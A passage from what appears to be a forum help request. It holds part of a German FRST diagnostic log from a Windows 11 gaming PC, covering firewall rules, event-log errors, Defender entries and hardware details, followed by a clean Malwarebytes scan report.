Inc.) FirewallRules: [{BC4D4004-6CC0-4B02-BB58-8F07D19D15BC}] => (Allow) C:\Program Files\LGHUB\lghub.exe (Logitech Inc -> Logitech, Inc.) FirewallRules: [{D211FB03-BD91-4790-8D78-7DDB9AECF77A}] => (Allow) C:\Program Files\LGHUB\lghub_agent.exe (Logitech Inc -> Logitech, Inc.) FirewallRules: [{9CD7FEF2-C745-4954-B14C-339A46ADB283}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Automation\UE424\AutomationGame\Binaries\Win64\AutomationGame-Win64-Shipping.exe => Keine Datei FirewallRules: [{CC0FEB4A-3FBF-4879-A995-0D084353C7C6}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Automation\UE424\AutomationGame\Binaries\Win64\AutomationGame-Win64-Shipping.exe => Keine Datei FirewallRules: [TCP Query User{6D9B8F34-2B26-41D3-BF76-78F4E71A51BC}C:\program files (x86)\steam\steamapps\common\beamng.drive\bin64\beamng.drive.x64.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\beamng.drive\bin64\beamng.drive.x64.exe => Keine Datei FirewallRules: [UDP Query User{E241F44C-E58F-4D11-9F2E-A0B9B6217A48}C:\program files (x86)\steam\steamapps\common\beamng.drive\bin64\beamng.drive.x64.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\beamng.drive\bin64\beamng.drive.x64.exe => Keine Datei FirewallRules: [{1FE7012E-B665-4B27-9900-E55C6628EE64}] => (Allow) C:\Program Files (x86)\Microsoft\EdgeWebView\Application\101.0.1210.32\msedgewebview2.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [TCP Query User{6917D10F-C8A4-4C6A-894D-4AEB71790703}C:\xboxgames\7 days to die\content\7daystodie.exe] => (Allow) C:\xboxgames\7 days to die\content\7daystodie.exe => Keine Datei FirewallRules: [UDP Query User{631CCBB1-C32D-48F4-8829-699D6B215A10}C:\xboxgames\7 days to die\content\7daystodie.exe] => (Allow) C:\xboxgames\7 days to die\content\7daystodie.exe => Keine Datei FirewallRules: [{AD691BF8-6823-46E8-BD31-8A33E6ED7A48}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Euro Truck Simulator 2\bin\win_x64\eurotrucks2.exe (SCS Software s.r.o. -> SCS Software) FirewallRules: [{5AB68465-9AA0-4977-B241-B717CCF9DDD9}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Euro Truck Simulator 2\bin\win_x64\eurotrucks2.exe (SCS Software s.r.o. -> SCS Software) FirewallRules: [{A8D2771D-24FD-43ED-8FCA-29EEC4E30423}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Euro Truck Simulator 2\bin\win_x86\eurotrucks2.exe (SCS Software s.r.o. -> SCS Software) FirewallRules: [{A7EB8B8C-7967-4B02-A87F-257A28AB6DFF}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Euro Truck Simulator 2\bin\win_x86\eurotrucks2.exe (SCS Software s.r.o. -> SCS Software) FirewallRules: [TCP Query User{558070FA-7FF7-48EE-9C76-152BE0939141}C:\xboxgames\thehunter™- call of the wild - windows 10\content\thehuntercotw_f.exe] => (Allow) C:\xboxgames\thehunter™- call of the wild - windows 10\content\thehuntercotw_f.exe => Keine Datei FirewallRules: [UDP Query User{A7AC88C6-3394-4331-8DAF-CE449C336706}C:\xboxgames\thehunter™- call of the wild - windows 10\content\thehuntercotw_f.exe] => (Allow) C:\xboxgames\thehunter™- call of the wild - windows 10\content\thehuntercotw_f.exe => Keine Datei FirewallRules: [{88DF2EF8-F030-44AA-9779-2DF12C29C6A0}] => (Allow) C:\Program Files (x86)\Microsoft\EdgeWebView\Application\101.0.1210.39\msedgewebview2.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{24B6EE18-F83A-4EC6-BC93-45697A39D257}] => (Allow) C:\Program Files\EA Games\FIFA 22\FIFASetup\fifaconfig.exe (Electronic Arts, Inc. -> Electronic Arts) FirewallRules: [{A2B91E6C-7648-46C7-A6AE-04C1D9E47859}] => (Allow) C:\Program Files\EA Games\FIFA 22\FIFASetup\fifaconfig.exe (Electronic Arts, Inc. -> Electronic Arts) FirewallRules: [TCP Query User{BF17755B-5B61-482D-8CF5-B813E467175B}C:\program files\ea games\fifa 22\fifa22_trial.exe] => (Allow) C:\program files\ea games\fifa 22\fifa22_trial.exe (Electronic Arts, Inc. -> Electronic Arts) FirewallRules: [UDP Query User{CA3FCCD2-669F-4D88-AE28-7B138D962434}C:\program files\ea games\fifa 22\fifa22_trial.exe] => (Allow) C:\program files\ea games\fifa 22\fifa22_trial.exe (Electronic Arts, Inc. -> Electronic Arts) FirewallRules: [TCP Query User{79A1DBD9-1BEF-4393-9130-4F5D7C496F3D}C:\xboxgames\the catch- carp & coarse\content\fishinggame\binaries\win64\fishinggame-win64-shipping.exe] => (Allow) C:\xboxgames\the catch- carp & coarse\content\fishinggame\binaries\win64\fishinggame-win64-shipping.exe => Keine Datei FirewallRules: [UDP Query User{26FF6F10-0346-4763-B609-D39A36CCD0F5}C:\xboxgames\the catch- carp & coarse\content\fishinggame\binaries\win64\fishinggame-win64-shipping.exe] => (Allow) C:\xboxgames\the catch- carp & coarse\content\fishinggame\binaries\win64\fishinggame-win64-shipping.exe => Keine Datei FirewallRules: [{DFDB01D1-7992-4298-8C72-F3513CE5FC04}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Laptop Tycoon\Laptop Tycoon.exe (The NW.js Community) [Datei ist nicht signiert] FirewallRules: [{AAD6D802-4A36-4BC4-A900-513E511AB490}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Laptop Tycoon\Laptop Tycoon.exe (The NW.js Community) [Datei ist nicht signiert] FirewallRules: [TCP Query User{B43A1710-744D-4451-A1A8-00CF486F9B8D}C:\xboxgames\gears 5\content\geargame\binaries\winstore\gears5.exe] => (Allow) C:\xboxgames\gears 5\content\geargame\binaries\winstore\gears5.exe => Keine Datei FirewallRules: [UDP Query User{C3981029-176A-4754-9E08-682BAD53FA74}C:\xboxgames\gears 5\content\geargame\binaries\winstore\gears5.exe] => (Allow) C:\xboxgames\gears 5\content\geargame\binaries\winstore\gears5.exe => Keine Datei FirewallRules: [{41DA5546-1427-4B11-B6E8-7C2D362F29AF}] => (Allow) C:\Users\Pauli\AppData\Local\Programs\Opera\86.0.4363.59\opera.exe => Keine Datei FirewallRules: [TCP Query User{E723D973-EC33-4665-8E5E-AB4EC7D5C27B}C:\xboxgames\farming simulator 19 - windows 10\content\x64\farmingsimulator2019game.exe] => (Block) C:\xboxgames\farming simulator 19 - windows 10\content\x64\farmingsimulator2019game.exe => Keine Datei FirewallRules: [UDP Query User{88B8FC9D-6A14-454B-BBCB-4D18E73D0355}C:\xboxgames\farming simulator 19 - windows 10\content\x64\farmingsimulator2019game.exe] => (Block) C:\xboxgames\farming simulator 19 - windows 10\content\x64\farmingsimulator2019game.exe => Keine Datei FirewallRules: [TCP Query User{2CCEC191-F6D5-499B-943A-CDE693336389}C:\xboxgames\zombie army 4- dead war\content\bin\za4_dx12.exe] => (Allow) C:\xboxgames\zombie army 4- dead war\content\bin\za4_dx12.exe => Keine Datei FirewallRules: [UDP Query User{67A5C2D2-7EEF-430B-A0A5-D0F90D52CB59}C:\xboxgames\zombie army 4- dead war\content\bin\za4_dx12.exe] => (Allow) C:\xboxgames\zombie army 4- dead war\content\bin\za4_dx12.exe => Keine Datei FirewallRules: [TCP Query User{96E0865A-CE7B-48FE-97DF-8CD6DED9E333}C:\xboxgames\wreckfest\content\wreckfest_x64.exe] => (Allow) C:\xboxgames\wreckfest\content\wreckfest_x64.exe => Keine Datei FirewallRules: [UDP Query User{82C8F325-083E-4135-B74A-5BFB42CE2B67}C:\xboxgames\wreckfest\content\wreckfest_x64.exe] => (Allow) C:\xboxgames\wreckfest\content\wreckfest_x64.exe => Keine Datei FirewallRules: [TCP Query User{414CFA2F-BF48-4E0C-9046-7655764C704C}C:\xboxgames\halo infinite\content\haloinfinite.exe] => (Allow) C:\xboxgames\halo infinite\content\haloinfinite.exe => Keine Datei FirewallRules: [UDP Query User{0F057596-CA65-4B3B-9400-7C3331F7E5EC}C:\xboxgames\halo infinite\content\haloinfinite.exe] => (Allow) C:\xboxgames\halo infinite\content\haloinfinite.exe => Keine Datei FirewallRules: [TCP Query User{D58F3281-F2F3-46C2-B7C4-B5426E9F6DCD}C:\xboxgames\farming simulator 22 - window 10 edition\content\x64\farmingsimulator2022game.exe] => (Allow) C:\xboxgames\farming simulator 22 - window 10 edition\content\x64\farmingsimulator2022game.exe => Keine Datei FirewallRules: [UDP Query User{D1A6EA94-B040-4F12-8BAE-488895FB67F0}C:\xboxgames\farming simulator 22 - window 10 edition\content\x64\farmingsimulator2022game.exe] => (Allow) C:\xboxgames\farming simulator 22 - window 10 edition\content\x64\farmingsimulator2022game.exe => Keine Datei FirewallRules: [{F4CB3D55-1F6F-4B09-8C3D-8F155E59FBC0}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Cat Goes Fishing\Cat Goes Fishing.exe (Cat5Games) [Datei ist nicht signiert] FirewallRules: [{DB5C971D-8610-4850-A020-2F884CB80D92}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Cat Goes Fishing\Cat Goes Fishing.exe (Cat5Games) [Datei ist nicht signiert] FirewallRules: [{2C8A2669-D6E8-4B56-9348-A53D87BFF32E}] => (Allow) C:\Program Files\WindowsApps\MicrosoftTeams_22133.500.1346.3200_x64__8wekyb3d8bbwe\msteams.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{3489505C-978E-43FE-8090-F7D3EBA37127}] => (Allow) C:\Program Files\WindowsApps\MicrosoftTeams_22133.500.1346.3200_x64__8wekyb3d8bbwe\msteams.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{F4A0E537-2C9D-4BE8-9687-826D8DE920C3}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (Nvidia Corporation -> NVIDIA Corporation) FirewallRules: [{852A427B-109C-48B7-9451-06920F248C98}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (Nvidia Corporation -> NVIDIA Corporation) FirewallRules: [{78BD71D0-24FD-4678-91A7-422DFFB3BB45}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (Nvidia Corporation -> NVIDIA Corporation) FirewallRules: [{E1BCFD28-2FE4-4FE1-B74B-81FB119F53E0}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (Nvidia Corporation -> NVIDIA Corporation) FirewallRules: [{6C909464-8F80-4026-9DBA-A5754934832F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Gas Station Simulator\GSS2.exe (Epic Games, Inc.) [Datei ist nicht signiert] FirewallRules: [{0D02BB1E-6D11-4483-9C50-D2C58F781B26}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Gas Station Simulator\GSS2.exe (Epic Games, Inc.) [Datei ist nicht signiert] FirewallRules: [TCP Query User{34E30CF7-102E-44D8-B2DE-B59C0092109A}C:\users\pauli\appdata\local\discord\app-1.0.9004\discord.exe] => (Allow) C:\users\pauli\appdata\local\discord\app-1.0.9004\discord.exe (Discord Inc. -> Discord Inc.) FirewallRules: [UDP Query User{BD0C5CA6-F532-4924-A5CE-FB16F58C772F}C:\users\pauli\appdata\local\discord\app-1.0.9004\discord.exe] => (Allow) C:\users\pauli\appdata\local\discord\app-1.0.9004\discord.exe (Discord Inc. -> Discord Inc.) FirewallRules: [{BBAB18EA-BEF4-4FB2-B98B-91F7FBFB41A8}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.186.857.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [{2F47B55E-FD42-4823-88F0-85B68E888F2F}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.186.857.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [{869E0F0D-631F-498C-B188-6DA093D1B952}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.186.857.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [{9C2E8663-3AE8-4E72-8489-55AB2264BECA}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.186.857.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [{47275175-429F-4DD5-B735-3B4930F265FC}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.186.857.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [{483C85BA-F566-4214-BB61-F303AA73560E}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.186.857.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [{80F3E5AE-7A35-4B44-AF60-4641F33F60A2}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.186.857.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [{63EDE1EA-1FF6-47DF-8A96-79CB527D5FB6}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.186.857.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [{DCD34471-A903-4BEC-82E8-780981A1DE39}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Ready Or Not\ReadyOrNot.exe (Epic Games, Inc.) [Datei ist nicht signiert] FirewallRules: [{45C9FEDA-04A6-49DA-9944-155A1A4AF552}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Ready Or Not\ReadyOrNot.exe (Epic Games, Inc.) [Datei ist nicht signiert] FirewallRules: [{3BE8210A-0AAF-482A-961D-F163C6E7B118}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Days Gone\BendGame\Binaries\Win64\DaysGone.exe (Sony Interactive Entertainment LLC) [Datei ist nicht signiert] FirewallRules: [{DB72C83D-60A3-42DF-9A94-1ED244B498D8}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Days Gone\BendGame\Binaries\Win64\DaysGone.exe (Sony Interactive Entertainment LLC) [Datei ist nicht signiert] FirewallRules: [TCP Query User{819B0931-824F-4EF4-AE3C-4EDA27964DB2}C:\xboxgames\microsoft flight simulator\content\flightsimulator.exe] => (Allow) C:\xboxgames\microsoft flight simulator\content\flightsimulator.exe (Zugriff verweigert) [Datei ist nicht signiert] FirewallRules: [UDP Query User{1722DB7C-3BDF-45BE-BB6D-7824668F59AA}C:\xboxgames\microsoft flight simulator\content\flightsimulator.exe] => (Allow) C:\xboxgames\microsoft flight simulator\content\flightsimulator.exe (Zugriff verweigert) [Datei ist nicht signiert] ==================== Wiederherstellungspunkte ========================= 11-06-2022 20:24:42 UE4 Prerequisites (x64) 17-06-2022 13:59:15 Windows Modules Installer 19-06-2022 21:21:23 Windows Modules Installer ==================== Fehlerhafte Geräte im Gerätemanager ============ ==================== Fehlereinträge in der Ereignisanzeige: ======================== Applikationsfehler: ================== Error: (06/19/2022 09:09:05 PM) (Source: VSS) (EventID: 8193) (User: ) Description: Volumeschattenkopie-Dienstfehler: Beim Aufrufen von Routine "CoCreateInstance" ist ein unerwarteter Fehler aufgetreten. hr = 0x8007045b, Der Computer wird heruntergefahren. . Error: (06/19/2022 09:09:05 PM) (Source: VSS) (EventID: 13) (User: ) Description: Volumenschattenkopie-Dienst-Informationen: Der COM-Server mit CLSID {4e14fba2-2e22-11d1-9964-00c04fbbb345} und dem Namen "CEventSystem" kann nicht gestartet werden. [0x8007045b, Der Computer wird heruntergefahren. ] Error: (06/19/2022 10:42:31 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Name der fehlerhaften Anwendung: NfsCcSvc.exe, Version: 22.0.0.1800, Zeitstempel: 0x625eb293 Name des fehlerhaften Moduls: unknown, Version: 0.0.0.0, Zeitstempel: 0x00000000 Ausnahmecode: 0xc0000005 Fehleroffset: 0x010fff84 ID des fehlerhaften Prozesses: 0x5d40 Startzeit der fehlerhaften Anwendung: 0x01d88330fc7dfe39 Pfad der fehlerhaften Anwendung: C:\ProgramData\NFS\v3\NfsCcSvc.exe Pfad des fehlerhaften Moduls: unknown Berichtskennung: f145e9c6-053c-427d-9b99-0ac064ff5160 Vollständiger Name des fehlerhaften Pakets: Anwendungs-ID, die relativ zum fehlerhaften Paket ist: Error: (06/18/2022 09:41:06 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Name der fehlerhaften Anwendung: NMS.exe, Version: 22975.0.0.0, Zeitstempel: 0x62a0e3fd Name des fehlerhaften Moduls: CELib_x64.dll, Version: 6.0.0.0, Zeitstempel: 0x00000000 Ausnahmecode: 0xc0000005 Fehleroffset: 0x000000000000b421 ID des fehlerhaften Prozesses: 0x52c Startzeit der fehlerhaften Anwendung: 0x01d8834a75ac6197 Pfad der fehlerhaften Anwendung: C:\Program Files\WindowsApps\HelloGames.NoMansSky_3.92.22975.0_x64__bs190hzg1sesy\Binaries\NMS.exe Pfad des fehlerhaften Moduls: C:\Users\Pauli\AppData\Local\WeMod\app-8.2.0\resources\app.asar.unpacked\static\unpacked\trainerlib\CELib_x64.dll Berichtskennung: 657ff699-d770-4f59-a1a2-b72db7579ad5 Vollständiger Name des fehlerhaften Pakets: HelloGames.NoMansSky_3.92.22975.0_x64__bs190hzg1sesy Anwendungs-ID, die relativ zum fehlerhaften Paket ist: NoMansSky Error: (06/18/2022 06:35:15 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Name der fehlerhaften Anwendung: GamingServices.exe, Version: 10.0.22000.4359, Zeitstempel: 0x892834fb Name des fehlerhaften Moduls: ucrtbase.dll, Version: 10.0.22000.1, Zeitstempel: 0x00e78ce9 Ausnahmecode: 0xc0000409 Fehleroffset: 0x000000000007dd7e ID des fehlerhaften Prozesses: 0x3e80 Startzeit der fehlerhaften Anwendung: 0x01d88242a138e4d5 Pfad der fehlerhaften Anwendung: C:\Program Files\WindowsApps\Microsoft.GamingServices_4.66.2001.0_x64__8wekyb3d8bbwe\GamingServices.exe Pfad des fehlerhaften Moduls: C:\Windows\System32\ucrtbase.dll Berichtskennung: 9f520c97-4514-4ada-8439-a9c6a85a5b5b Vollständiger Name des fehlerhaften Pakets: Microsoft.GamingServices_4.66.2001.0_x64__8wekyb3d8bbwe Anwendungs-ID, die relativ zum fehlerhaften Paket ist: GamingServices Error: (06/18/2022 06:31:52 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Name der fehlerhaften Anwendung: NfsCcSvc.exe, Version: 22.0.0.1800, Zeitstempel: 0x625eb293 Name des fehlerhaften Moduls: unknown, Version: 0.0.0.0, Zeitstempel: 0x00000000 Ausnahmecode: 0xc0000005 Fehleroffset: 0x0311ff84 ID des fehlerhaften Prozesses: 0x1a78 Startzeit der fehlerhaften Anwendung: 0x01d87fe4661efb37 Pfad der fehlerhaften Anwendung: C:\ProgramData\NFS\v3\NfsCcSvc.exe Pfad des fehlerhaften Moduls: unknown Berichtskennung: 1ed7dae3-7a6d-4802-b73b-b0e536145660 Vollständiger Name des fehlerhaften Pakets: Anwendungs-ID, die relativ zum fehlerhaften Paket ist: Error: (06/17/2022 02:06:09 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Name der fehlerhaften Anwendung: GamingServices.exe, Version: 10.0.22000.4359, Zeitstempel: 0x892834fb Name des fehlerhaften Moduls: ucrtbase.dll, Version: 10.0.22000.1, Zeitstempel: 0x00e78ce9 Ausnahmecode: 0xc0000409 Fehleroffset: 0x000000000007dd7e ID des fehlerhaften Prozesses: 0x227c Startzeit der fehlerhaften Anwendung: 0x01d87fe466ec47c2 Pfad der fehlerhaften Anwendung: C:\Program Files\WindowsApps\Microsoft.GamingServices_4.66.2001.0_x64__8wekyb3d8bbwe\GamingServices.exe Pfad des fehlerhaften Moduls: C:\Windows\System32\ucrtbase.dll Berichtskennung: 8ed9008e-1e6e-4208-863f-9912144a1a16 Vollständiger Name des fehlerhaften Pakets: Microsoft.GamingServices_4.66.2001.0_x64__8wekyb3d8bbwe Anwendungs-ID, die relativ zum fehlerhaften Paket ist: GamingServices Error: (06/16/2022 11:13:52 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Name der fehlerhaften Anwendung: GTA5.exe, Version: 1.0.2628.2, Zeitstempel: 0x627b8997 Name des fehlerhaften Moduls: ucrtbase.dll, Version: 10.0.22000.1, Zeitstempel: 0x00e78ce9 Ausnahmecode: 0xc0000409 Fehleroffset: 0x000000000007dd7e ID des fehlerhaften Prozesses: 0x3d28 Startzeit der fehlerhaften Anwendung: 0x01d88161358ac38b Pfad der fehlerhaften Anwendung: C:\Program Files\Rockstar Games\Grand Theft Auto V\GTA5.exe Pfad des fehlerhaften Moduls: C:\Windows\System32\ucrtbase.dll Berichtskennung: b925e69c-d266-4ef0-bddb-e8068c7d5ca4 Vollständiger Name des fehlerhaften Pakets: Anwendungs-ID, die relativ zum fehlerhaften Paket ist: Systemfehler: ============= Error: (06/20/2022 09:42:42 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1096) (User: Pauls_Gaming_PC) Description: Fehler bei der Verarbeitung der Gruppenrichtlinie. Es wurde versucht, registrierungsbasierte Richtlinieneinstellungen für das Gruppenrichtlinienobjekt "LocalGPO-S-1-5-21-1424437550-2087844553-323541659-1001" zu lesen. Die Gruppenrichtlinieneinstellungen dürfen nicht erzwungen werden, bis dieses Ereignis behoben ist. Weitere Informationen über den Dateinamen und -pfad, der den Fehler verursacht hat, können den Ereignisdetails entnommen werden. Error: (06/20/2022 09:41:41 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1096) (User: Pauls_Gaming_PC) Description: Fehler bei der Verarbeitung der Gruppenrichtlinie. Es wurde versucht, registrierungsbasierte Richtlinieneinstellungen für das Gruppenrichtlinienobjekt "LocalGPO-S-1-5-21-1424437550-2087844553-323541659-1001" zu lesen. Die Gruppenrichtlinieneinstellungen dürfen nicht erzwungen werden, bis dieses Ereignis behoben ist. Weitere Informationen über den Dateinamen und -pfad, der den Fehler verursacht hat, können den Ereignisdetails entnommen werden. Error: (06/20/2022 09:40:50 AM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Dienst "SCC-Dienst" wurde unerwartet beendet. Dies ist bereits 8 Mal passiert. Error: (06/20/2022 09:24:36 AM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Dienst "SCC-Dienst" wurde unerwartet beendet. Dies ist bereits 7 Mal passiert. Error: (06/20/2022 09:17:36 AM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Dienst "SCC-Dienst" wurde unerwartet beendet. Dies ist bereits 6 Mal passiert. Error: (06/20/2022 09:16:36 AM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Dienst "SCC-Dienst" wurde unerwartet beendet. Dies ist bereits 5 Mal passiert. Error: (06/20/2022 09:16:35 AM) (Source: Server) (EventID: 2505) (User: ) Description: Aufgrund eines doppelten Netzwerknamens konnte zu der Transportschicht \Device\NetBT_Tcpip_{A99B7A34-7B15-42D4-B39D-6C218B5A2543} vom Serverdienst nicht gebunden werden. Der Serverdienst konnte nicht gestartet werden. Error: (06/19/2022 10:21:31 PM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1096) (User: Pauls_Gaming_PC) Description: Fehler bei der Verarbeitung der Gruppenrichtlinie. Es wurde versucht, registrierungsbasierte Richtlinieneinstellungen für das Gruppenrichtlinienobjekt "LocalGPO-S-1-5-21-1424437550-2087844553-323541659-1001" zu lesen. Die Gruppenrichtlinieneinstellungen dürfen nicht erzwungen werden, bis dieses Ereignis behoben ist. Weitere Informationen über den Dateinamen und -pfad, der den Fehler verursacht hat, können den Ereignisdetails entnommen werden. Windows Defender: ================ Date: 2022-06-19 21:22:39 Description: Der überwachte Ordnerzugriff hat C:\Program Files (x86)\ASUS\ROG Live Service\ROGLiveService.exe daran gehindert, Änderungen am Speicher durchzuführen. Erkennungszeit: 2022-06-19T19:22:39.917Z Benutzer: NT-AUTORITÄT\SYSTEM Pfad: \Device\Harddisk0\DR0 Name des Prozesses: C:\Program Files (x86)\ASUS\ROG Live Service\ROGLiveService.exe Sicherheitsversion: 1.367.1823.0 Modulversion: 1.1.19200.6 Produktversion: 4.18.2203.5 Date: 2022-06-18 21:27:52 Description: Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet. Überprüfungs-ID: {B3A76C59-9698-4DD3-BF27-0FB5594B52E8} Überprüfungstyp: Antimalware Überprüfungsparameter: Schnellüberprüfung Benutzer: NT-AUTORITÄT\SYSTEM Date: 2022-06-16 10:27:27 Description: Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet. Überprüfungs-ID: {4B203982-7985-472A-A720-06F7C61C3D59} Überprüfungstyp: Antimalware Überprüfungsparameter: Schnellüberprüfung Benutzer: NT-AUTORITÄT\SYSTEM Date: 2022-06-11 19:52:36 Description: Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet. Überprüfungs-ID: {308EC18E-3B63-40C3-A4C1-A0E91733EA38} Überprüfungstyp: Antimalware Überprüfungsparameter: Schnellüberprüfung Benutzer: NT-AUTORITÄT\SYSTEM Date: 2022-06-10 21:43:43 Description: Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet. Überprüfungs-ID: {A5EC059C-8BBC-4DA0-AEE8-B77747C809D7} Überprüfungstyp: Antimalware Überprüfungsparameter: Schnellüberprüfung Benutzer: NT-AUTORITÄT\SYSTEM Event[0] Date: 2022-06-02 12:57:43 Description: Bei Microsoft Defender Antivirus ist ein Fehler beim Aktualisieren der Sicherheitsinformationen aufgetreten. Neue Version der Sicherheitsinformationen: %Vorherige Version der Sicherheitsinformationen: 1.367.893.0 Update Source: Microsoft Update-Server Sicherheitstyp: AntiVirus Updatetyp: Voll Benutzer: NT-AUTORITÄT\SYSTEM Aktuelle Modulversion: %Vorherige Modulversion: 1.1.19200.6 Fehlercode: 0x80240438 Fehlerbeschreibung: Unerwartetes Problem bei der Überprüfung auf Updates. Informationen zum Installieren von Updates oder zur Problembehandlung finden Sie unter "Hilfe und Support". CodeIntegrity: =============== Date: 2022-06-06 20:42:25 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Spybot - Search & Destroy 2\SDLicense.dll that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2022-06-06 20:15:19 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. ==================== Speicherinformationen =========================== BIOS: American Megatrends Inc. 0418 10/12/2021 Hauptplatine: ASUSTeK COMPUTER INC. TUF GAMING B660-PLUS WIFI D4 Prozessor: 12th Gen Intel(R) Core(TM) i5-12400 Prozentuale Nutzung des RAM: 25% Installierter physikalischer RAM: 32509.4 MB Verfügbarer physikalischer RAM: 24351.17 MB Summe virtueller Speicher: 37373.4 MB Verfügbarer virtueller Speicher: 27034.39 MB ==================== Laufwerke ================================ Drive c: () (Fixed) (Total:930.79 GB) (Free:325.77 GB) (Model: Samsung SSD 970 EVO Plus 1TB) NTFS \\?\Volume{0816333f-f890-4581-955e-76fe023609d7}\ () (Fixed) (Total:0.6 GB) (Free:0.08 GB) NTFS \\?\Volume{77f49904-ead3-4c93-8b25-6a0466739b74}\ () (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32 ==================== MBR & Partitionstabelle ==================== ========================================================== Disk: 0 (Protective MBR) (Size: 931.5 GB) (Disk ID: 00000000) Partition: GPT. ==================== Ende von Addition.txt ======================= Code:
ATTFilter Malwarebytes www.malwarebytes.com -Protokolldetails- Scan-Datum: 20.06.22 Scan-Zeit: 10:55 Protokolldatei: bda25edc-f076-11ec-adf4-50ebf625b1e9.json -Softwaredaten- Version: 4.5.10.200 Komponentenversion: 1.0.1702 Version des Aktualisierungspakets: 1.0.56313 Lizenz: Abgelaufen -Systemdaten- Betriebssystem: Windows 11 (Build 22000.739) CPU: x64 Dateisystem: NTFS Benutzer: Pauls_Gaming_PC\Pauli -Scan-Übersicht- Scan-Typ: Bedrohungs-Scan Scan gestartet von: Manuell Ergebnis: Abgeschlossen Gescannte Objekte: 295936 Erkannte Bedrohungen: 0 In die Quarantäne verschobene Bedrohungen: 0 Abgelaufene Zeit: 1 Min., 37 Sek. -Scan-Optionen- Speicher: Aktiviert Start: Aktiviert Dateisystem: Aktiviert Archive: Aktiviert Rootkits: Aktiviert Heuristik: Aktiviert PUP: Erkennung PUM: Erkennung -Scan-Details- Prozess: 0 (keine bösartigen Elemente erkannt) Modul: 0 (keine bösartigen Elemente erkannt) Registrierungsschlüssel: 0 (keine bösartigen Elemente erkannt) Registrierungswert: 0 (keine bösartigen Elemente erkannt) Registrierungsdaten: 0 (keine bösartigen Elemente erkannt) Daten-Stream: 0 (keine bösartigen Elemente erkannt) Ordner: 0 (keine bösartigen Elemente erkannt) Datei: 0 (keine bösartigen Elemente erkannt) Physischer Sektor: 0 (keine bösartigen Elemente erkannt) WMI: 0 (keine bösartigen Elemente erkannt) (end) ADWcleaner Log: Code:
